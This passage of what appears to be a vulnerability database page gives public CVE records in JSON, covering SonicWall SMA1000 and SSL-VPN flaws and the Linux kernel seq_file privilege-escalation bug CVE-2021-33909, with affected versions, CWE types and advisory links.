      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-248",
              "description": "CWE-248: Uncaught Exception",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-03-26T03:35:12",
        "orgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
        "shortName": "sonicwall"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0002"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "PSIRT@sonicwall.com",
          "ID": "CVE-2020-5129",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "SMA1000",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "12.1.0-06411 and earlier"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "SonicWall"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause HTTP server crash which leads to Denial of Service. This vulnerability affected SMA1000 Version 12.1.0-06411 and earlier."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-248: Uncaught Exception"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0002",
              "refsource": "CONFIRM",
              "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0002"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
    "assignerShortName": "sonicwall",
    "cveId": "CVE-2020-5129",
    "datePublished": "2020-03-26T03:35:12",
    "dateReserved": "2019-12-31T00:00:00",
    "dateUpdated": "2024-08-04T08:22:08.523Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-0126
Vulnerability from cvelistv5
Published
2023-01-19 00:00
Modified
2024-08-02 05:02
Severity ?
Summary
Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.
Impacted products
SonicWallSonicWall SMA1000
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T05:02:43.761Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SonicWall SMA1000",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "12.4.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-01-19T00:00:00",
        "orgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
        "shortName": "sonicwall"
      },
      "references": [
        {
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
    "assignerShortName": "sonicwall",
    "cveId": "CVE-2023-0126",
    "datePublished": "2023-01-19T00:00:00",
    "dateReserved": "2023-01-09T00:00:00",
    "dateUpdated": "2024-08-02T05:02:43.761Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2020-5132
Vulnerability from cvelistv5
Published
2020-09-30 05:25
Modified
2024-08-04 08:22
Severity ?
Summary
SonicWall SSL-VPN products and SonicWall firewall SSL-VPN feature misconfiguration leads to possible DNS flaw known as domain name collision vulnerability. When the users publicly display their organization’s internal domain names in the SSL-VPN authentication page, an attacker with knowledge of internal domain names can potentially take advantage of this vulnerability.
References
Impacted products
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T08:22:08.680Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0006"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SMA100",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "SMA100 10.2.0.2-20sv"
            }
          ]
        },
        {
          "product": "SMA1000",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "SMA1000 12.4.0-2223"
            }
          ]
        },
        {
          "product": "SonicOS",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "SonicOS 6.5.4.6-79n"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SonicWall SSL-VPN products and SonicWall firewall SSL-VPN feature misconfiguration leads to possible DNS flaw known as domain name collision vulnerability. When the users publicly display their organization\u2019s internal domain names in the SSL-VPN authentication page, an attacker with knowledge of internal domain names can potentially take advantage of this vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-09-30T05:25:11",
        "orgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
        "shortName": "sonicwall"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0006"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "PSIRT@sonicwall.com",
          "ID": "CVE-2020-5132",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "SMA100",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "SMA100 10.2.0.2-20sv"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SMA1000",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "SMA1000 12.4.0-2223"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SonicOS",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "SonicOS 6.5.4.6-79n"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "SonicWall"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "SonicWall SSL-VPN products and SonicWall firewall SSL-VPN feature misconfiguration leads to possible DNS flaw known as domain name collision vulnerability. When the users publicly display their organization\u2019s internal domain names in the SSL-VPN authentication page, an attacker with knowledge of internal domain names can potentially take advantage of this vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0006",
              "refsource": "CONFIRM",
              "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0006"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
    "assignerShortName": "sonicwall",
    "cveId": "CVE-2020-5132",
    "datePublished": "2020-09-30T05:25:11",
    "dateReserved": "2019-12-31T00:00:00",
    "dateUpdated": "2024-08-04T08:22:08.680Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-33909
Vulnerability from cvelistv5
Published
2021-07-20 18:01
Modified
2024-08-04 00:05
Severity ?
Summary
fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05.
References
https://lists.debian.org/debian-lts-announce/2021/07/msg00016.htmlmailing-list, x_refsource_MLIST
https://lists.debian.org/debian-lts-announce/2021/07/msg00014.htmlmailing-list, x_refsource_MLIST
https://lists.debian.org/debian-lts-announce/2021/07/msg00015.htmlmailing-list, x_refsource_MLIST
https://www.debian.org/security/2021/dsa-4941vendor-advisory, x_refsource_DEBIAN
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z4UHHIGISO3FVRF4CQNJS4IKA25ATSFU/vendor-advisory, x_refsource_FEDORA
http://www.openwall.com/lists/oss-security/2021/07/22/7mailing-list, x_refsource_MLIST
http://www.openwall.com/lists/oss-security/2021/08/25/10mailing-list, x_refsource_MLIST
http://www.openwall.com/lists/oss-security/2021/09/17/2mailing-list, x_refsource_MLIST
http://www.openwall.com/lists/oss-security/2021/09/17/4mailing-list, x_refsource_MLIST
http://www.openwall.com/lists/oss-security/2021/09/21/1mailing-list, x_refsource_MLIST
https://www.oracle.com/security-alerts/cpujan2022.htmlx_refsource_MISC
https://www.openwall.com/lists/oss-security/2021/07/20/1x_refsource_MISC
https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53bx_refsource_CONFIRM
https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.4x_refsource_CONFIRM
http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.htmlx_refsource_MISC
http://packetstormsecurity.com/files/163671/Kernel-Live-Patch-Security-Notice-LSN-0079-1.htmlx_refsource_MISC
https://security.netapp.com/advisory/ntap-20210819-0004/x_refsource_CONFIRM
http://packetstormsecurity.com/files/164155/Kernel-Live-Patch-Security-Notice-LSN-0081-1.htmlx_refsource_MISC
http://packetstormsecurity.com/files/165477/Kernel-Live-Patch-Security-Notice-LSN-0083-1.htmlx_refsource_MISC
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015x_refsource_CONFIRM
Impacted products
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T00:05:52.143Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-2] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html"
          },
          {
            "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-1] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html"
          },
          {
            "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2714-1] linux-4.19 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html"
          },
          {
            "name": "DSA-4941",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2021/dsa-4941"
          },
          {
            "name": "FEDORA-2021-07dc0b3eb1",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z4UHHIGISO3FVRF4CQNJS4IKA25ATSFU/"
          },
          {
            "name": "[oss-security] 20210722 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/07/22/7"
          },
          {
            "name": "[oss-security] 20210825 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/08/25/10"
          },
          {
            "name": "[oss-security] 20210916 Containers-optimized OS (COS) membership in the linux-distros list",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/09/17/2"
          },
          {
            "name": "[oss-security] 20210917 Re: Containers-optimized OS (COS) membership in the linux-distros list",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/09/17/4"
          },
          {
            "name": "[oss-security] 20210920 Re: Containers-optimized OS (COS) membership in the linux-distros list",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/09/21/1"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.openwall.com/lists/oss-security/2021/07/20/1"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.4"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/163671/Kernel-Live-Patch-Security-Notice-LSN-0079-1.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20210819-0004/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/164155/Kernel-Live-Patch-Security-Notice-LSN-0081-1.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/165477/Kernel-Live-Patch-Security-Notice-LSN-0083-1.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-08-09T21:06:18",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-2] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html"
        },
        {
          "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-1] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html"
        },
        {
          "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2714-1] linux-4.19 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html"
        },
        {
          "name": "DSA-4941",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2021/dsa-4941"
        },
        {
          "name": "FEDORA-2021-07dc0b3eb1",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z4UHHIGISO3FVRF4CQNJS4IKA25ATSFU/"
        },
        {
          "name": "[oss-security] 20210722 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/07/22/7"
        },
        {
          "name": "[oss-security] 20210825 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/08/25/10"
        },
        {
          "name": "[oss-security] 20210916 Containers-optimized OS (COS) membership in the linux-distros list",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/09/17/2"
        },
        {
          "name": "[oss-security] 20210917 Re: Containers-optimized OS (COS) membership in the linux-distros list",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/09/17/4"
        },
        {
          "name": "[oss-security] 20210920 Re: Containers-optimized OS (COS) membership in the linux-distros list",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/09/21/1"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.openwall.com/lists/oss-security/2021/07/20/1"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.4"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/163671/Kernel-Live-Patch-Security-Notice-LSN-0079-1.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20210819-0004/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/164155/Kernel-Live-Patch-Security-Notice-LSN-0081-1.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/165477/Kernel-Live-Patch-Security-Notice-LSN-0083-1.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-33909",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-2] linux security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html"
            },
            {
              "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2713-1] linux security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html"
            },
            {
              "name": "[debian-lts-announce] 20210720 [SECURITY] [DLA 2714-1] linux-4.19 security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html"
            },
            {
              "name": "DSA-4941",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2021/dsa-4941"
            },
            {
              "name": "FEDORA-2021-07dc0b3eb1",
              "refsource": "FEDORA",
              "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z4UHHIGISO3FVRF4CQNJS4IKA25ATSFU/"
            },
            {
              "name": "[oss-security] 20210722 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/07/22/7"
            },
            {
              "name": "[oss-security] 20210825 Re: CVE-2021-33909: size_t-to-int vulnerability in Linux\u0027s filesystem layer",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/08/25/10"
            },
            {
              "name": "[oss-security] 20210916 Containers-optimized OS (COS) membership in the linux-distros list",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/09/17/2"
            },
            {
              "name": "[oss-security] 20210917 Re: Containers-optimized OS (COS) membership in the linux-distros list",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/09/17/4"
            },
            {
              "name": "[oss-security] 20210920 Re: Containers-optimized OS (COS) membership in the linux-distros list",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/09/21/1"
            },
            {
              "name": "https://www.oracle.com/security-alerts/cpujan2022.html",
              "refsource": "MISC",
              "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
            },
            {
              "name": "https://www.openwall.com/lists/oss-security/2021/07/20/1",
              "refsource": "MISC",
              "url": "https://www.openwall.com/lists/oss-security/2021/07/20/1"
            },
            {
              "name": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b",
              "refsource": "CONFIRM",
              "url": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b"
            },
            {
              "name": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.4",
              "refsource": "CONFIRM",
              "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.4"
            },
            {
              "name": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html"
            },
            {
              "name": "http://packetstormsecurity.com/files/163671/Kernel-Live-Patch-Security-Notice-LSN-0079-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/163671/Kernel-Live-Patch-Security-Notice-LSN-0079-1.html"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20210819-0004/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20210819-0004/"
            },
            {
              "name": "http://packetstormsecurity.com/files/164155/Kernel-Live-Patch-Security-Notice-LSN-0081-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/164155/Kernel-Live-Patch-Security-Notice-LSN-0081-1.html"
            },
            {
              "name": "http://packetstormsecurity.com/files/165477/Kernel-Live-Patch-Security-Notice-LSN-0083-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/165477/Kernel-Live-Patch-Security-Notice-LSN-0083-1.html"
            },
            {
              "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015",
              "refsource": "CONFIRM",
              "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-33909",
    "datePublished": "2021-07-20T18:01:34",
    "dateReserved": "2021-06-07T00:00:00",
    "dateUpdated": "2024-08-04T00:05:52.143Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}